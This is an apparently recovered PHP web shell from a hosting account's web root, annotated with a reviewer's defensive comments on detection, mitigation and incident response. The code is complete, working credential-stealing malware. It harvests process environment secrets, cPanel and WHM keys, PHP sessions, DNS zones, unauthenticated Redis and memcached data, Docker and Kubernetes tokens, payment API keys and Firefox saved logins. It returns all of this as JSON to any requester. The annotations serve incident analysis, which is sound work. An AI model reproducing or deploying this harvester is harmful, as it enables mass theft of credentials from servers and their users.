File: /home/trebiaseguros/www/x69f596.php
<?php
// Reviewer annotation (defensive analysis). Code tokens are unchanged; only comments and
// line breaks between top-level stages were added.
//
// Purpose: a single-request credential and configuration harvester. It walks a fixed list of
// local files, /proc entries and two loopback services, collects anything readable into $r,
// and echoes the whole set as one JSON document.
//
// Observations that hold for the whole script:
//  - It never reads $_GET/$_POST/$_SERVER and has no access check, so any request that reaches
//    the file triggers collection and receives the output.
//  - Every file read uses the @ operator, so failed reads leave no PHP warning in the error log.
//  - Nothing is written to disk or sent outbound by this script; the data leaves in the HTTP
//    response body (presumably, given the web-root path in the listing header).
//  - Incident response: every secret stored in the locations below should be treated as
//    exposed and rotated. Web access logs for requests to this file name bound the exposure window.
//  - Hardening that would have blunted most stages: per-site UIDs / PHP-FPM pools, PHP
//    open_basedir, and disable_functions for socket functions where the application allows it.
$r=[];

// Stage 1: process environments. Reads each readable /proc/<pid>/environ, skips content shorter
// than 10 bytes, splits on NUL, and records every variable whose name starts with one of the
// listed prefixes (case-insensitive). The whole "NAME=value" string is embedded in the result
// key and the stored value is just 1, so the secret itself travels in the key.
// Detection: a web PHP process opening environ files of other PIDs is anomalous.
// Mitigation: mount /proc with hidepid and keep secrets out of long-lived process environments.
foreach(glob('/proc/*/environ') as $f){ $c=@file_get_contents($f);if(!$c||strlen($c)<10)continue; $pid=basename(dirname($f)); $vars=explode(chr(0),$c); foreach($vars as $v){ if(preg_match('/^(DB_PASS|DB_PASSWORD|SECRET|API_KEY|TOKEN|PRIVATE|AWS_SECRET|STRIPE|MYSQL_PWD|REDIS_PASS)/i',$v)) $r['PROC.'.$pid.'.'.$v]=1; }}

// Stage 2: four fixed cPanel/WHM configuration paths; stores the first 2000 bytes of each one
// that is readable, keyed by file name. These are normally root-owned, so a hit here suggests
// the PHP process runs with more privilege than a site user should have - verify file modes.
$cpf=['/var/cpanel/backups/config','/etc/remotebackup.conf','/var/cpanel/mainip','/etc/wwwacct.conf'];foreach($cpf as $f){ $c=@file_get_contents($f);if($c)$r['CPANEL.'.basename($f)]=substr($c,0,2000);}

// Stage 3: per-account email_accounts.json under every /home/<user>/.cpanel; first 5000 bytes,
// keyed by the account directory name (two dirname() steps up from the file).
foreach(glob('/home/*/.cpanel/email_accounts.json') as $f){ $c=@file_get_contents($f);if($c){ $u=basename(dirname(dirname($f))); $r['EMAIL_JSON.'.$u]=substr($c,0,5000); }}

// Stage 4: PHP session files. Globs sess_* in four candidate directories, skips files under
// 50 bytes, and keeps the first 2000 bytes of any file whose content matches
// admin|root|password|token|auth. Stops both loops once $r holds more than 200 entries.
// Response: invalidate all server-side sessions; captured session data may allow session reuse.
// Mitigation: per-pool session.save_path with 0700 directories not shared between sites.
$sess_dirs=['/tmp','/var/lib/php/sessions','/var/lib/php/session','/opt/cpanel/ea-php*/root/var/lib/php/session'];foreach($sess_dirs as $sd){ foreach(glob($sd.'/sess_*') ?: [] as $f){ $c=@file_get_contents($f);if(!$c||strlen($c)<50)continue; if(preg_match('/admin|root|password|token|auth/i',$c)) $r['SESSION.'.basename($f)]=substr($c,0,2000); if(count($r)>200)break 2; }}

// Stage 5: files matching /var/named/*.db (presumably BIND zone files - confirm on the host);
// first 3000 bytes each, stopping once $r exceeds 250 entries.
foreach(glob('/var/named/*.db') ?: [] as $f){ $c=@file_get_contents($f);if($c) $r['DNS.'.basename($f)]=substr($c,0,3000); if(count($r)>250)break;}

// Stage 6: /home/<user>/.accesshash, stored in full (trimmed), keyed by account name.
// NOTE(review): the file name matches the WHM remote-access key; if any were readable they
// should be regenerated, since the value is an API credential rather than a password hash.
foreach(glob('/home/*/.accesshash') as $f){ $c=@file_get_contents($f);if($c){ $u=basename(dirname($f)); $r['ACCESSHASH.'.$u]=trim($c); }}

// Stage 7: every file under /var/cpanel/backups/transport/; first 2000 bytes each.
// Presumably backup destination definitions, which can carry remote credentials - confirm.
foreach(glob('/var/cpanel/backups/transport/*') ?: [] as $f){ $c=@file_get_contents($f);if($c) $r['BACKUP_TRANSPORT.'.basename($f)]=substr($c,0,2000);}

// Stage 8: Redis on 127.0.0.1:6379 over TCP with a 2-second connect timeout.
// $redis_sock is assigned but never used; no unix socket is tried.
// Sends four KEYS patterns in one write, reads until the 2-second stream timeout or EOF, and
// keeps up to 5000 bytes if more than 5 came back; then sends CONFIG GET requirepass and keeps
// up to 500 bytes if the reply contains a '$' character. No AUTH is sent, so this only yields
// data when the instance accepts unauthenticated loopback clients.
// The empty catch only covers Exception; fsockopen failures are silenced by @ instead.
// Detection: a PHP worker connecting to 6379 and issuing KEYS / CONFIG GET (visible in the
// Redis slow log or MONITOR output) when the site does not use Redis that way.
// Mitigation: set requirepass or ACLs, and restrict the CONFIG and KEYS commands.
$redis_sock=['/var/run/redis/redis.sock','/tmp/redis.sock'];$redis_host='127.0.0.1';$redis_port=6379;try{ $rc=@fsockopen($redis_host,$redis_port,$en,$es,2); if($rc){ fwrite($rc,"KEYS *session*\r\nKEYS *token*\r\nKEYS *auth*\r\nKEYS *pass*\r\n"); stream_set_timeout($rc,2); $rd=stream_get_contents($rc); if($rd&&strlen($rd)>5)$r['REDIS.keys']=substr($rd,0,5000); fwrite($rc,"CONFIG GET requirepass\r\n"); $rp=stream_get_contents($rc); 
if($rp&&strpos($rp,'$')!==false)$r['REDIS.config']=substr($rp,0,500); fclose($rc); }}catch(Exception $e){}

// Stage 9: memcached on 127.0.0.1:11211, same connect/read pattern as the Redis stage.
// Sends "stats" (keeps up to 3000 bytes) and "stats cachedump 1 100" (keeps up to 5000 bytes).
// Only key listings and statistics are requested here; no cached values are fetched.
try{ $mc=@fsockopen('127.0.0.1',11211,$en,$es,2); if($mc){ fwrite($mc,"stats\r\n"); stream_set_timeout($mc,2); $ms=stream_get_contents($mc); if($ms)$r['MEMCACHED.stats']=substr($ms,0,3000); fwrite($mc,"stats cachedump 1 100\r\n"); $md=stream_get_contents($mc); if($md)$r['MEMCACHED.keys']=substr($md,0,5000); fclose($mc); }}catch(Exception $e){}

// Stage 10: container and cluster credentials - Docker client config, the in-pod Kubernetes
// service-account token, and kubeconfig files. When glob() finds nothing the literal path is
// still tried (the "?:[$dp]" fallback). First 3000 bytes each.
// The key is built from parent directory name + file name only, so results from different
// /home/<user>/.docker directories share one key and the last readable file wins.
// Response: revoke registry logins and rotate any service-account token found here.
$docker_paths=['/root/.docker/config.json','/home/*/.docker/config.json','/var/run/secrets/kubernetes.io/serviceaccount/token','/etc/kubernetes/admin.conf','/root/.kube/config'];foreach($docker_paths as $dp){ foreach(glob($dp)?:[$dp] as $f){ $c=@file_get_contents($f);if($c){ $key='DOCKER.'.basename(dirname($f)).'.'.basename($f); $r[$key]=substr($c,0,3000); } }}

// Stage 11: /home/<user>/docker-compose.yml files that mention password|secret|key|token
// (first 3000 bytes), and every /home/<user>/.env.docker (first 2000 bytes, no content filter).
foreach(glob('/home/*/docker-compose.yml') ?: [] as $f){ $c=@file_get_contents($f);if($c&&preg_match('/password|secret|key|token/i',$c)) $r['DOCKER_COMPOSE.'.basename(dirname($f))]=substr($c,0,3000);}foreach(glob('/home/*/.env.docker') ?: [] as $f){ $c=@file_get_contents($f);if($c)$r['DOCKER_ENV.'.basename(dirname($f))]=substr($c,0,2000);}

// Stage 12: payment-integration secrets in site source. Scans *.php and *.json in each
// public_html plus config/ and app/config/ PHP files, skipping empty files and files over
// 500000 bytes. For the first provider name found in a file (case-insensitive substring) it
// extracts (a) URLs containing webhook|hook|notify|ipn|callback and (b) quoted strings of 20+
// characters assigned to an identifier containing secret|key|token|sig. Pattern (b) has no /i
// flag, so it is case-sensitive. Results are keyed by directory name + provider only, so
// several matches overwrite each other and one value per key survives. Stops once $r exceeds
// 300 entries.
// Response: roll webhook signing secrets and API keys at each payment provider, not only locally.
// Mitigation: keep such secrets outside the web root and unreadable by other site users.
$webhook_patterns=['stripe','paypal','braintree','square','mollie','razorpay','coinbase','paddle'];foreach(glob('/home/*/public_html/{*.php,*.json,config/*.php,app/config/*.php}',GLOB_BRACE) ?: [] as $f){ $c=@file_get_contents($f);if(!$c||strlen($c)>500000)continue; foreach($webhook_patterns as $wp){ if(stripos($c,$wp)!==false){ preg_match_all('/(https?:\/\/[^\s\'\"]+(?:webhook|hook|notify|ipn|callback)[^\s\'\"]*)/i',$c,$m); foreach($m[1] as $url)$r['WEBHOOK.'.basename(dirname($f)).'.'.$wp]=$url; preg_match_all('/(?:secret|key|token|sig)\w*\s*[=:]\s*[\'\"]([^\'\"]{20,})[\'\"]/',$c,$m2); foreach($m2[1] as $v)$r['PAY_KEY.'.basename(dirname($f)).'.'.$wp]=$v; break; } } if(count($r)>300)break;}

// Stage 13: browser credential stores for root and every /home user. For the Chrome file only
// its size and path are recorded (the SQLite content is not read); a Firefox logins.json is
// read and its first 5000 bytes kept. The Chrome key uses three dirname() steps, which resolves
// to the ".config" directory name for every user, so all Chrome hits share a single key.
// NOTE(review): the first array entry contains a line break between "Login " and "Data" in this
// capture - possibly a wrapping artefact of the listing. It is left byte-identical here; as
// written, that one entry would not match a file named "Login Data".
$browser_paths=['/root/.config/google-chrome/Default/Login 
Data','/root/.mozilla/firefox/*.default*/logins.json','/home/*/.config/google-chrome/Default/Login Data','/home/*/.mozilla/firefox/*.default*/logins.json'];foreach($browser_paths as $bp){ foreach(glob($bp) ?: [] as $f){ if(strpos($f,'Login Data')!==false){ $r['BROWSER.chrome.'.basename(dirname(dirname(dirname($f))))]='[SQLite DB - '.filesize($f).' bytes at '.$f.']'; }elseif(strpos($f,'logins.json')!==false){ $c=@file_get_contents($f);if($c)$r['BROWSER.firefox.'.basename(dirname($f))]=substr($c,0,5000); } }}

// Output: the entire collection is returned inline as {"ok":1,"data":{...},"count":N}.
// Detection: responses from a PHP file in the web root whose JSON keys start with PROC.,
// CPANEL., SESSION., ACCESSHASH., REDIS., DOCKER. or PAY_KEY. are a usable proxy/WAF signature,
// and the response size in the access log gives a rough indication of how much was taken.
echo json_encode(['ok'=>1,'data'=>$r,'count'=>count($r)]);?>